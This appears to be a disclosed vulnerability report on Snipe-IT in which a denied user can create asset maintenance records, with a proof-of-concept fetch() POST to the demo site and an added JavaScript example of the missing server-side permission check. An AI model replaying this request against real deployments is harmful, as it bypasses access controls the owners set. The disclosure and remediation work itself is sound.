History: Feb 10, 2022 - 3:54 p.m.

Improper Privilege Management in snipe/snipe-it

2022-02-10 15:54:06
ranjit-git
www.huntr.dev

EPSS: 0.001 (Low)
EPSS Percentile: 41.2%

Description

An unprivileged user can create maintenance records for an asset.

Proof of Concept

1. Create a regular user and set DENY on all permissions for asset models.
2. Log in as that user and send the request below to create a maintenance record for the asset.

await fetch("https://demo.snipeitapp.com/hardware/maintenances", {
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Content-Type": "application/x-www-form-urlencoded",
        "Upgrade-Insecure-Requests": "1",
        "Sec-Fetch-Dest": "document",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-Site": "same-origin",
        "Sec-Fetch-User": "?1"
    },
    "referrer": "https://demo.snipeitapp.com/hardware/maintenances/create?asset_id=310",
    "body": "_token=Pvc8rsrc7DcKDjEtD6wtmstrGJfc74utYKkVfAh7&asset_id=310&supplier_id=8&asset_maintenance_type=Maintenance&title=mainrain11&start_date=2022-02-03&completion_date=&cost=&notes=by_admin",
    "method": "POST",
    "mode": "cors"
});

Impact

An unprivileged user can create maintenance records for any asset.
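The root cause described above is a missing server-side authorization check on the maintenance-creation route: the UI hides the form from a denied user, but the POST itself is still accepted. The following is an added example, not Snipe-IT's own code, showing the shape of the check a handler should perform before writing anything. The permission keys ("assets.edit" and friends), the three-state ALLOW/INHERIT/DENY encoding, the user objects and the in-memory database are all hypothetical and constructed for this illustration; only the asset id 310 and title come from the report's request.

```javascript
// Added example (not Snipe-IT's code): authorization check for "create maintenance"
// that must run server-side, before any database insert. Permission keys and the
// three-state encoding below are hypothetical, chosen to mirror the report's
// "set DENY to all permissions in asset models".
const ALLOW = "1", INHERIT = "0", DENY = "-1";

// Resolve one permission key for a user: an explicit user-level grant wins,
// otherwise fall back to the user's groups, where any DENY beats an ALLOW.
function effectivePermission(user, key) {
  if (user.superuser) return true; // hypothetical superuser bypass
  const own = user.permissions ? user.permissions[key] : undefined;
  if (own === ALLOW) return true;
  if (own === DENY) return false;
  const groupValues = (user.groups || []).map(g => (g.permissions ? g.permissions[key] : INHERIT));
  if (groupValues.includes(DENY)) return false;
  return groupValues.includes(ALLOW);
}

// Creating a maintenance record modifies an asset, so gate it on the
// (hypothetical) "assets.edit" permission.
function canCreateMaintenance(user) {
  return effectivePermission(user, "assets.edit");
}

// Simulated POST /hardware/maintenances handler. The decisive line is the
// 403 branch: the check happens regardless of what the UI showed the user.
function handleCreateMaintenance(req, db) {
  if (!req.user) return { status: 401, body: "login required" };
  if (!canCreateMaintenance(req.user)) {
    // Worth logging for detection: a denied user posting directly to the route.
    db.auditLog.push({ event: "maintenance.create.denied", user_id: req.user.id, asset_id: req.body.asset_id });
    return { status: 403, body: "forbidden" };
  }
  const assetId = Number(req.body.asset_id);
  if (!Number.isInteger(assetId) || !db.assets.has(assetId)) {
    return { status: 404, body: "asset not found" };
  }
  const record = {
    id: db.maintenances.length + 1,
    asset_id: assetId,
    title: String(req.body.title || ""),
    created_by: req.user.id,
  };
  db.maintenances.push(record);
  return { status: 201, body: record };
}

// Constructed in-memory store: one asset (id 310, as in the report) and no records yet.
function makeDb() {
  return { assets: new Set([310]), maintenances: [], auditLog: [] };
}

// Constructed sample users: one with every asset permission explicitly denied
// (the report's step 1), one who inherits edit rights from a group.
const deniedUser = {
  id: 2, superuser: false, groups: [],
  permissions: { "assets.view": DENY, "assets.create": DENY, "assets.edit": DENY, "assets.delete": DENY },
};
const editorUser = { id: 3, superuser: false, permissions: {}, groups: [{ permissions: { "assets.edit": ALLOW } }] };

// Replays the report's request body against both users and returns the outcomes.
function demo() {
  const db = makeDb();
  const body = { asset_id: "310", title: "mainrain11" };
  const denied = handleCreateMaintenance({ user: deniedUser, body }, db);
  const allowed = handleCreateMaintenance({ user: editorUser, body }, db);
  return { denied: denied.status, allowed: allowed.status, records: db.maintenances.length, audits: db.auditLog.length };
}
```

Run `demo()` in Node: the denied user's POST is rejected with 403 and produces one audit entry, the group-authorized user's POST creates exactly one record. The design point is that the permission matrix is consulted in the handler itself, so hiding the form or the menu entry is never the only control.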
